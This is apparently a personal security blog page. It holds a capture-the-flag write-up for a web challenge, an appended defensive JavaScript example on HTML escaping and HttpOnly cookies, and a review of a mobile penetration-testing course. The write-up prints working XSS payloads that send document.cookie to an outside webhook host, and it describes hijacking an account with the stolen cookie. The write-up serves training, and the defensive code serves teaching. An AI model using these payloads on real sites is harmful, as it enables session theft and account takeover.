Author: n31tp8h

  • Titanic

    Coming Soon!

  • OnlyHacks

    Summary

    This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

    Write-up

    The login page appears resistant to basic SQL injection and authentication bypass attempts.

    We will move on with the Sign Up function.

    The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

    Moving on to the Dashboard.

    Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.

    I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

    Let's try some basic XSS with:

    <script>alert(1)</script>

    We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

    <script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

    Or

    <script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>

    Replace our own cookie with the one we captured and refresh the page to get the flag.

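    As an added example that is not part of the original write-up or the challenge's own dashboard.js, the following Node-runnable JavaScript shows both sides of what the payloads above depend on: a chat message interpolated into markup without encoding (so the probe runs) beside the encoded render that neutralises it, and a session cookie set with HttpOnly so that document.cookie cannot read it. The function names are assumptions; the cookie attributes are the standard ones.

```javascript
// Added example for this write-up; not the challenge's dashboard.js.
// Function names are assumptions. Runs under Node.js with no dependencies.

// Unsafe render: user text is interpolated straight into markup, so a chat
// message such as <script>alert(1)</script> becomes live HTML once the
// string is inserted into the page via innerHTML.
function renderMessageUnsafe(text) {
  return `<div class="msg">${text}</div>`;
}

// Output encoding: the five HTML-significant characters become entities, so
// the same message renders as visible text and never as a tag.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}
function renderMessageSafe(text) {
  return `<div class="msg">${escapeHtml(text)}</div>`;
}

// Quick check usable in a code review or over rendered-output samples: does
// the output still contain an unencoded <script ...> tag?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Second layer, independent of the rendering fix: an HttpOnly session cookie
// is not exposed through document.cookie, so neither payload in the write-up
// would see it even if the XSS itself still fired. Secure and SameSite limit
// where the browser sends the cookie at all.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: the probe message from the write-up.
const PROBE_MESSAGE = '<script>alert(1)</script>';

console.log('unsafe:', renderMessageUnsafe(PROBE_MESSAGE));
console.log('safe:  ', renderMessageSafe(PROBE_MESSAGE));
console.log('cookie:', sessionCookieHeader('session', 'abc 123'));
```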
  • Practical Mobile Pentest Associate (PMPA) Course Review

    Overview

    This course offers a fun and accessible introduction to basic Android and iOS penetration testing techniques, covering topics like static and dynamic analysis.

    At $249, it's a worthwhile investment for a resume-enhancing certification. A more advanced course from TCM covering deeper techniques would be a valuable future addition.

    Exam

    The exam is an Android app, so pay close attention to the Android section of the course materials.

    Thoroughly review the rules of engagement and instructions before starting the exam; you'll have ample time.

    If you're new to web application penetration testing, familiarize yourself with the OWASP Top 10. Completing the HTB OWASP Top 10 track is highly recommended preparation.

    Tips

    • Take regular screenshots during the exam for your report.
    • The exam VM is web-based with a fixed resolution, which may sometimes prevent resizing your Android emulator. If this occurs, adjust your browser’s zoom and refresh the page until the emulator fits your screen.